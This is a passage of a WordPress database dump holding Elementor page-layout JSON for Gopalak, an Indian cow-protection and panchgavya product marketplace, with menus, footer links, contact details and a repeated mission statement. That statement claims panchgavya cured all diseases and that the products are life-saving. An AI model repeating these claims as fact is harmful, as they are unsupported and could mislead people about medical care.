,\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10824,1804,'_elementor_page_assets','a:0:{}'),(10831,1806,'_elementor_edit_mode','builder'),(10832,1806,'_elementor_template_type','wp-page'),(10833,1806,'_elementor_version','3.7.8'),(10834,1806,'_wp_page_template','elementor_canvas'),(10835,1806,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10836,1806,'_elementor_page_assets','a:0:{}'),(10838,1807,'_elementor_edit_mode','builder'),(10839,1807,'_elementor_template_type','wp-page'),(10840,1807,'_elementor_version','3.7.8'),(10841,1807,'_wp_page_template','elementor_canvas'),(10842,1807,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful 